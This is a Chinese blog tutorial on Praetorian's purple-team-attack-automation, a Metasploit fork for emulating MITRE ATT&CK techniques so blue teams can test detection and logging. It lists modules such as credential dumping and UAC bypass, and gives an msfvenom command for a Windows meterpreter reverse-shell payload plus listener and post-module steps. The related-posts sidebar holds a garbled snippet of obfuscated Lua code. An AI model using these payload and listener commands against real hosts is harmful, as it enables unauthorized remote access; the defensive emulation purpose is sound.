purple-team-attack-automation(紫色团队攻击自动化)学习与研究

最新推荐文章于 2022-11-21 21:37:40 发布
最新推荐文章于 2022-11-21 21:37:40 发布
阅读量1.3k 收藏
点赞数 1
分类专栏: ATT&CK 日志分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334464/article/details/103512546
版权

1. 简介

该工具是原始metasploit框架的分支,用于模拟攻击者的战术,技术和程序(TTP)。该工具的主要重点是帮助Blue Teams了解其映射到MITER ATT&CK™框架的检测差距。

2. 可用模块

2.1 Windows

  • Windows:ADIDNS(PowerMad)
  • Windows:Active Directory自动发现(BloodHound)
  • Windows:数据压缩(T1002)
  • Windows:凭证转储(T1003)
  • Windows:Winlogon帮助器DLL(T1004)
  • Windows:来自本地系统的数据(T1005)
  • Windows:系统服务发现(T1007)
  • Windows:应用程序窗口发现(T1010)
  • Windows:查询注册表(T1012)
  • Windows:端口监视器(T1013)
  • Windows:辅助功能(T1015)
  • Windows:系统网络配置发现(T1016)
  • Windows:远程系统发现(T1018)
  • Windows:快捷方式修改(T1023)
  • Windows:Windows远程管理(T1028)
  • Windows:修改现有服务(T1031)
  • Windows:系统所有者/用户发现(T1033)
  • Windows:路径拦截(T1034)
  • Windows:服务执行(T1035)
  • Windows:伪装(T1036)
  • Windows:登录脚本(T1037)
  • Windows:文件系统权限不足(T1044)
  • Windows:Windows管理规范(T1047)
  • Windows:系统网络连接发现(T1049)
  • Windows:新服务(T1050)
  • Windows:计划任务(T1053)
  • Windows:流程注入(T1055)
  • Windows:输入捕获(T1056)
  • Windows:进程发现(T1057)
  • Windows:运行键(T1060)
  • Windows:安全软件发现(T1063)
  • Windows:权限组发现(T1069)
  • Windows:从工具中删除指示器(T1070)
  • Windows:通过哈希(T1075)
  • Windows:Windows管理员共享(T1077)
  • Windows:有效帐户(T1078)
  • Windows:文件中的凭据(T1081)
  • Windows:系统信息发现(T1082)
  • Windows:文件和目录发现(T1083)
  • Windows:Windows管理规范事件订阅(1084)
  • Windows:Rundll32(T1085)
  • Windows:PowerShell(T1086)
  • Windows:帐户发现(T1087)
  • Windows:绕过UAC(T1088)
  • Windows:禁用安全工具(T1089)
  • Windows:Windows NTFS扩展属性(T1096)
  • Windows:帐户操作(T1098)
  • Windows:Timestomp(T1099)
  • Windows:AppInit DLL(T1103)
  • Windows:远程文件复制(T1105)
  • Windows:文件删除(T1107)
  • Windows:暴力破解(T1110)
  • Windows:修改注册表(T1112)
  • Windows:屏幕捕获(T1113)
  • Windows:剪贴板数据(T1115)
  • Windows:Regsvr32(T1117)
  • Windows:InstallUtil(T1118)
  • Windows:自动收集(T1119)
  • Windows:外围设备发现(T1120)
  • Windows:Regsvcs/Regasm(T1121)
  • Windows:音频捕获(T1123)
  • Windows:系统时间发现(T1124)
  • Windows:视频捕获(T1125)
  • Windows:受信任的开发人员实用程序(T1127)
  • Windows:安装根证书(T1130)
  • Windows:身份验证程序包(T1131)
  • Windows:网络共享发现(T1135)
  • Windows:创建帐户(T1136)
  • Windows:MSHTA(T1170)
  • Windows:分布式组件对象模型(T1175)
  • Windows:屏幕保护程序(T1180)
  • Windows:CMSTP(T1191)
  • Windows:控制面板项目(T1196)
  • Windows:BITS作业(T1197)
  • Windows:密码策略发现(T1201)
  • Windows:Kerberoasting(T1208)
  • Windows:时间提供者(T1209)
  • Windows:签名的二进制代理执行(T1218)

2.2 Linux

  • Linux:系统网络配置发现(T1016)
  • Linux:系统所有者/用户发现(T1033)
  • Linux:系统网络连接发现(T1049)
  • Linux:进程发现(T1057)
  • Linux:权限组发现(T1069)
  • Linux:系统信息发现(T1082)
  • Linux:帐户发现(T1087)
  • Linux:文件删除(T1107)
  • Linux:密码策略发现(T1201)

2.3 MacOS

  • macOS:数据压缩(T1002)
  • macOS:系统网络配置发现(T1016)
  • macOS:网络共享发现(T1135)
  • macOS:创建帐户(T1136)
  • macOS:Bash历史记录(T1139)
  • macOS:密码策略发现(T1201)

2.4 Multi

  • Multi:远程系统发现(T1018)
  • Multi:网络服务扫描(T1046)

具体可参考官方wiki介绍:https://github.com/praetorian-code/purple-team-attack-automation/wiki/Available-Modules

2.工具部署及安装方法

2.1 docker/docker-compose安装

apt-get install docker docker-compose

2.2 下载项目文件至本地

git clone https://github.com/praetorian-code/purple-team-attack-automation.git

2.3 修改LHOST和端口

echo "version: '3'
services:
  ms:
    environment:
    # example of setting LHOST
      LHOST: 0.0.0.0
    # example of adding more ports
    ports:
      - 8080:8080
      - 443:443
      - 80:80
" > docker-compose.local.override.yml #此文件需要自行创建,然后复制上述内容写入文档即可

2.4 设置COMPOSE_FILE环境变量

echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env

2.5 运行docker服务并运行工具

service docker start
docker-compose build
./docker/bin/msfconsole #当前目录下执行此命令

在这里插入图片描述
其他环境安装可参考官方说明:https://github.com/praetorian-code/purple-team-attack-automation/wiki/Installation

3. 操作与使用

3.1 生成Meterpreter有效载荷

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your locahost IP> LPORT=4444 -f exe > meterpreter.exe  #新建窗口执行命令,利用此命令生成的MSF载荷可能存在问题,建议自行修改

3.2 启动并运行本地监听

 use exploit/multi/handler
 set Interrupt: use the 'exit' command to quit
 set PAYLOAD windows/meterpreter/reverse_tcp
 set LHOST <Attacker IP Address>
 set LPORT 4444
 exploit -j -z
 # docker msfconsole中执行监听命令

端口监听
复制并在目标(“受害者”)主机上以管理员身份运行payload.exe,然后等待会话。
运行载荷
等待会话

3.3 查看已有TTP模块

search purple
# docker msfconsole中执行

查找可以使用的模块

3.4 模拟T1087

use modules/post/windows/purple/t1087 #设置要使用的TTP
info #查看TTP模块配置
set session 1  #设置会话
run #执行载荷
#docker msfconsole中执行

选择使用的模块设置会话并执行

后续

安全从业人员(尤其是蓝队成员),可以利用purple-team-attack-automation模拟相关TTP,并在客户端部署并配置相关审核策略,记录相关事件日志(windows_log/sysmon/message),并转发至大数据分析平台(splunk/elk等)进行数据分析,提升蓝队成员对攻击的理解以及对异常行为的敏感度。

关于purple-team-attack-automation(紫色团队攻击自动化)更多信息可参考项目原址介绍:https://github.com/praetorian-code/purple-team-attack-automation

关于ATT&CK具体TTP中文介绍可参考瀚思科技MITRE ATT&CK 攻击知识库(企业)中文版项目:https://hansight.github.io/#/

关于ATT&CK具体TTP原文介绍可参考MITER官方介绍:https://attack.mitre.org/

12306Br0
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
揭秘渗透测试中的特殊队伍(三)-紫队
这里是二进制空间安全博客,主要分享网络安全、信息安全和数据安全相关的技术文章。内容覆盖编程语言、基础知识、漏洞分析、攻防技巧、安全工具使用、最佳实践等安全技术主题。
09-17 209
2016年起逐渐有信息安全公司提供商业化的紫队服务,2017-2018年,紫队概念在行业内越来越受重视,适应网络威胁复杂多变的需要,紫队活跃于威胁模拟、漏洞管理等领域,紫队思想强调主动防御,渗透红队和监测蓝队职能合二为一;2019-2020年,紫队成为网络安全防御的新Orient;各行业积极建设独立或与红蓝队协作的紫队;未来紫队会运用更多自动化手段,实现智能化漏洞狩猎,紫队代表网络安全防御模式的进化方向。
使用VackBAS攻击模拟平台对抗勒索病毒
Moyun_vackbot的博客
12-16 735
基于目前整体态势,许多公司在应对勒索病毒威胁时捉襟见肘,特别是针对医疗、能源、制造行业,犯罪分子为了最大化的非法利益,他们不断演进自身的攻击方式,通过有更有针对性的定制化勒索软件,攻击者精确地在网络上找到易受攻击的目标,通过各种自动或手动的渗透方式进行攻击。目前比较有针对性的勒索软件攻击并不依靠随机选择的受害者支付的小额赎金,而是遵循完整杀伤链,从获得对网络的初始访问权开始到最终加密文件来完成最大程度的感染,以获取最高额的勒索赎金。对于使用它的犯罪分子来说,勒索病毒在全球已是一个价值数十亿美元的行业。
Purple-Team
03-31
return(function(purpleteam_g,purpleteam_r,purpleteam_s)local purpleteam_k = string.char; local Purpleteam_e = string.sub; local Purpleteam_m = table.concat; local Purpleteam_n = math.ldexp; local Purpleteam_t = getfenv或function()返回_ENV结束; local purpleteam_o =选择; local Purpleteam_h =解包或table.unpack; local Purpleteam_i = tonumber;本地函数Purpleteam_l(purpleteam_h)local Purpleteam_b,purpleteam_c,purplete
PTAA:一款功能强大的紫队自动化渗透测试工具
systemino的博客
05-01 1531
为了评估安全检测与事件响应能力,我们正在尝试寻找一种自动化模拟对手攻击策略的方式。通过研究,我们设计出了MITRE ATT&CK™ TTPs,并以Metasploit Framework的模块形式呈现-post模块。目前,我们已经可以自动化模拟出超过100 种TTPs了。 Metasploit的优势就在于其稳定健壮且丰富的功能库,该框架所带的模块能够与操作系统API直接交互,而...
网络安全学习笔记——紫队实战攻防组织
just do it
11-21 1656
紫队指在网络实战攻防中的组织方。在演习中,负责演习组织,过程监控,技术指导,应急保障,风险控制,演习总结,技术措施与策略优化等工作。通过红蓝攻防检验参演单位安全威胁应对能力,攻击事件检测发现能力。事件分析研判能力,事件响应处置能力以及应急响应机制与流程的有效性,提升参演单位的安全实战能力。
给AI系统做“安全体检”,阿里安全提出自动化AI对抗平台CAA | AAAI 2021
AI科技大本营
12-11 790
出品 | AI科技大本营(ID:rgznai100)安全人员曾为某车企自动驾驶系统做过一次安全测试,用物理对抗攻击欺骗Autopilot车道检测系统,导致汽车在Autopilot不发出警...
purple-team-exercise-framework:紫色团队运动框架
05-05
紫色团队是一个虚拟团队,其中以下团队共同努力: 网络威胁情报-研究和提供威胁TTP的团队红色团队-负责模仿对手的进攻团队蓝队-防守者。 安全运营中心(SOC),寻线团队,数字取证和事件响应(DFIR)和/或托管安全...
project-2-team-purple:项目2-紫色团队
05-25
Doc-To-Go! ## Project DescriptionDoctorGoThe purpose of the app is to help organize and schedule appointments for Doctors who perform house calls. Patients can enter info such as Name, age, address, ...
purple-prototype:紫色概念证明
02-05
purple-prototype:紫色概念证明
Shades-of-Purple-iTerm2:Purple紫色阴影-用于iTerm2和Zsh的带有精选和大胆紫色阴影的专业主题
05-01
iTerm2的紫色主题阴影 iTerm2和ZSH的紫色阴影主题一世 :purple_heart: 紫色,因为紫色可以是天才。 FOSS(免费和开源软件)项目。 由维护。 专业的iTerm2主题,带有手工挑选和大胆的紫色阴影 :purple_heart: 与您的...
purple_team_watch:紫色团队观看应用程序
06-01
LevelUp Watch Edition 应用开发环境 + 这个 git repo 包含为 Proto Watch 构建应用程序原型所需的所有代码。 安装 查看 持续集成 在你提交之前 检查 CI 构建,除非通过,否则不要提交! git pull --rebase grunt pre-commit 修复任何错误 git push 检查构建状态 要查看构建状态并获取有关构建状态的通知: 访问并点击屏幕右上角的“CCTray” 将 XML 配置添加到开发机器上的 CCTray 或 CCMenu 您还可以在此处访问 CI 服务器并查看构建状态 技术栈 技术堆栈中有许多部分,但其中许多只是为了提供自动化,不必为了构建 Proto Watch 应用程序而接触或理解。 在项目期间,您将主要使用 JavaScript、Backbone 和 Jasmine。 如果您正在构建手表应用程
ATTCK-Tools-library:TimelineSec ATT&CK 工具库
05-05
ATT-CK-Tools-library 声明 本项目工具仅供测试使用,请勿用于违法用途,否则后果自负!
windows采集音频
qianbo042311的博客
06-25 689
定义线程类 /* Author:钱波 email: 418511899@qq.com wei: 18091589062 func :线程类 time: 2018年5月30日 */ #ifndef _TTHREAD_RUN_ABLE_H_ #define _TTHREAD_RUN_ABLE_H_ #include <mutex> #include <queue> #include <thread> #include <atomic> #includ
内网域渗透分析工具BloodHound
LuckySec
04-13 5843
前言 当渗透进入内网后,利用BloodHound对庞大内网域环境进行自动化信息搜集并整理分析数据,提高渗透效率。 0x01 BloodHound介绍 BloodHound是一款可视化图形分析域环境中的关系的工具,以用图与线的形式,将域内用户、计算机、组、Sessions、ACLs以及域内所有相关用户、组、计算机、登陆信息、访问控制策略之间的关系更直观的展现在红队人员面前进行更便捷的分析域内情况,更快速的在域内提升自己的权限。它也可以使蓝队成员对己方网络系统进行更好的安全检测及保证域的安全性。 Neo4j是一
红队、蓝队和紫队组合:安全保障的协作方法
12306小哥
06-16 2631
红队、蓝队和紫队演习是创新的安全策略,可模拟现实生活中的网络攻击,以定位弱点,提高信息安全性,并最大限度地提高防御效率。这种团队努力为组织的安全状况提供了现实的对抗性评估。 利用具有特定目标、提高风险意识、提高技能和持续改进心态的专业团队的专业知识。随着越来越多的设备在互联网上上线,安全性已成为所有组织(无论大小)的挑战。 在过去的几年里,组织不得不适应局家工作的场景,并迅速采用从未经过测试的威胁模型。 ......
12、强大的内网域渗透提权分析工具——BloodHound
Fly_鹏程万里
06-14 1570
导语:简介和背景 在今年二月,我发布了一个名为“ PowerPath ” 的POC脚本,它整合了Will Schroeder的PowerView和Justin Warner的本地管理员衍生工具,图形理论以及Jim Truher(@jwtruher)为证明可以自动执行Active Directory域。简介和背景在今年二月,我发布了一个名为“ PowerPath ” 的POC脚本,它整合了Will ...
对STIX2.0标准12个构件的解读(续)——对STIX2.0官方文档的翻译
热门推荐
fufu_good的博客
02-02 7万+
攻击模式(Attack Pattern) 类别名称: attack-pattern 攻击模式是TTP的一种,描述了攻击者试图破坏目标的方式。攻击模式用于帮助对攻击进行分类,将特定攻击概括为其遵循的模式,并提供有关如何进行攻击的详细信息。攻击模式的一个示例是“网络钓鱼”:一种常见的攻击类型,其中,攻击者向一方发送精心制作的电子邮件,目的是使他们单击链接或打开附件来分发恶意软件。攻击模式也可以更具体。...
MITRE ATT&CK框架
Hi~ o(* ̄▽ ̄*)ブ
11-13 5949
0X00 什么是ATT&CK
python操作windows进程:杀进程、查进程
ttphoon的博客
10-25 2579
对于windows进程在程序里有不少地方要用到,比如进程监控,杀进程等,之前有遇到需要的地方就顺便封装了,希望有所帮助哈 代码如下 import psutil,os,datetime class windows_process_handler: def __init__(self): self.pids= psutil.pids() def refresh_pi...
Qt-Material有没有紫色的主体?
最新发布
05-26
是的,Qt-Material提供紫色的主题色。你可以通过设置QMaterialTheme的主题颜色为purple来设置紫色的主题。例如,以下代码将设置为紫色主题: ``` QMaterialTheme *theme = new QMaterialTheme(); theme->setThemeColor(QMaterialTheme::Purple); ``` 你还可以在Qt-Material提供的示例中查看不同的主题颜色。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值